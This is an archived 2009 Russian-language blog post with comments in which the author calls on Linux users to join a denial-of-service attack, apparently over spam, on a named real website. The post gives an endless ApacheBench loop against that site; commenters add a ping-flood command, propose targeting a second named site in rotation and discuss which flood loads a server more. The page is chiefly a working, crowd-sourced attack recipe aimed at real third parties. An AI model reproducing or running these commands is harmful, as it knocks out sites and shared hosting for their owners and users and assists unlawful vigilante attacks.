Товарищи линуксоиды, присоединяйтесь...

Feb. 3rd, 2009 05:05 pm
nataraj: (Default)
[personal profile] nataraj
$ sudo apt-get install apache2-utils
$ sudo perl -e"while (1){print `sudo ab -n 65535 -с50 http://clip.dn.ua/`;}"
Flat | Top-Level Comments Only

Date: 2009-02-03 02:10 pm (UTC)
From: [identity profile] alexkuklin.livejournal.com
-с 50 забыл

Date: 2009-02-03 02:30 pm (UTC)
ext_613079: Default userpic (Default)
From: [identity profile] shaplov.livejournal.com
О! Так поток посерьезнее пошел

Date: 2009-02-03 02:31 pm (UTC)
From: [identity profile] what-me.livejournal.com
А за что их так?

Date: 2009-02-04 08:34 am (UTC)
From: [identity profile] silverswordsman.livejournal.com
Таки за что? Там заморожено...

Date: 2009-02-04 09:20 am (UTC)
ext_613079: Default userpic (Default)
From: [identity profile] shaplov.livejournal.com
Спам...

Date: 2009-02-03 02:45 pm (UTC)
From: [identity profile] mar1ner.livejournal.com
да не только их надо...

Date: 2009-02-03 02:53 pm (UTC)
ext_613079: Default userpic (Default)
From: [identity profile] shaplov.livejournal.com
Я ссылку потерял...
Все посты уже удалили ;-)

Date: 2009-02-03 02:33 pm (UTC)
From: [identity profile] aceler.livejournal.com
А может, дустом пингом их?

Date: 2009-02-03 02:40 pm (UTC)
ext_613079: Default userpic (Default)
From: [identity profile] shaplov.livejournal.com
Ну так нагрузка кажется побольше будет...

Date: 2009-02-03 02:50 pm (UTC)
From: [identity profile] aceler.livejournal.com
ICMP пакеты размером меньше, чем http, поэтому в один и тот же канал влезет больше пакетов. В случае пинга DoS основана на перегрузке мощностей сервера, а не ширины канала, которая на провайдере обычно достаточно широка, в отличие от мощности процессора, обслуживающего десятки сайтов.

Date: 2009-02-03 02:55 pm (UTC)
ext_613079: Default userpic (Default)
From: [identity profile] shaplov.livejournal.com
Эээ... а сервер действительно выполняет что-то осмысленное на пинге?
Мне кажется что на генерации страницы оно ест во столько больше, что пинг просто как слону дробина...

Date: 2009-02-03 03:04 pm (UTC)
From: [identity profile] aceler.livejournal.com
> Эээ... а сервер действительно выполняет что-то осмысленное на пинге?

Ну если у него ICMP не заблочен, то да :) Конечно, генерация страницы — это круто, но на нормальных стрессоустойчивых сайтах используется кеширование, так что всё равно всё упрётся в количество запросов, а тут ping реально впереди.

Особенно пинг хорошо супротив IIS, хотя для IIS есть ещё более изощрённая атака — атака недосформированными пакетами.

Date: 2009-02-03 03:25 pm (UTC)
ext_613079: Default userpic (Default)
From: [identity profile] shaplov.livejournal.com
Ну... предположим...
Готов ли ты предложить пинговую версию дос скрипта, который можно было бы по быстрому запустить?

Date: 2009-02-03 03:35 pm (UTC)
From: [identity profile] aceler.livejournal.com
ping -fA address.com

Date: 2009-02-03 03:38 pm (UTC)
From: [identity profile] alexkuklin.livejournal.com
да, но:
1) один запрос http дает большой ответ
2) пинги просто заблокировать

Date: 2009-02-03 04:41 pm (UTC)
From: [identity profile] firebottle.livejournal.com
Именно так - нагрузка на ЦП в этом случае выше.

2 жертва: помогу отбиться от этой атаки за кругленькую сумму, каковую мы с братвой незамедлительно пропьем.

Date: 2009-02-03 06:22 pm (UTC)
From: [identity profile] aceler.livejournal.com
За кругленькую сумму можно арендовать Akamai :)

Date: 2009-02-03 06:25 pm (UTC)
From: [identity profile] firebottle.livejournal.com
Ви уже таки торгуетесь? :-)

Date: 2009-02-03 06:31 pm (UTC)
From: [identity profile] aceler.livejournal.com
А ви таки завидуете моим финансам? :-)

Date: 2009-02-03 02:39 pm (UTC)
From: [identity profile] mar1ner.livejournal.com
типа, хулиганство...
но ссылку дам.

Date: 2009-02-03 02:51 pm (UTC)
From: [identity profile] aceler.livejournal.com
А может, Соловьёва-похудейкина туда же?

Date: 2009-02-03 02:54 pm (UTC)
ext_613079: Default userpic (Default)
From: [identity profile] shaplov.livejournal.com
Я ссылку потерял...
А все посты у меня в ленте уже удалили...

Date: 2009-02-03 04:48 pm (UTC)
lodin: A bearded hacker in a hat (Default)
From: [personal profile] lodin
Надо список составить... И round-robin-ом.

Одно плохо, слишком большой потенциал для э... неправомерного коммерческого использования.

З.Ы. Похудейкин -- это вот: http://stroynost.org

Date: 2009-02-03 08:29 pm (UTC)
ext_613079: Default userpic (Default)
From: [identity profile] shaplov.livejournal.com
Вот именно поэтому лучше через социальную сеть...
Все видели эти посты, все могут это сделать... Каждый может лично проверить...

Date: 2009-02-03 04:46 pm (UTC)
lodin: A bearded hacker in a hat (Default)
From: [personal profile] lodin
Тут и баша хватит:

sh -c "while :; do ...; done"

И судо у тебя зачем-то два раза -- ещё пароль запросит!..

Date: 2009-02-03 08:30 pm (UTC)
ext_613079: Default userpic (Default)
From: [identity profile] shaplov.livejournal.com
Да не умею я на баше писать...

Не запрашивает...

А ab из под юзера не запускается.
Flat | Top-Level Comments Only

Profile

nataraj: (Default)
Swami Dhyan Nataraj

July 2024

S M T W T F S
 123456
789 10111213
14151617181920
21222324252627
28293031   

Most Popular Tags

Page Summary

Style Credit

Expand Cut Tags

No cut tags
Page generated Jan. 20th, 2026 10:02 pm
Powered by Dreamwidth Studios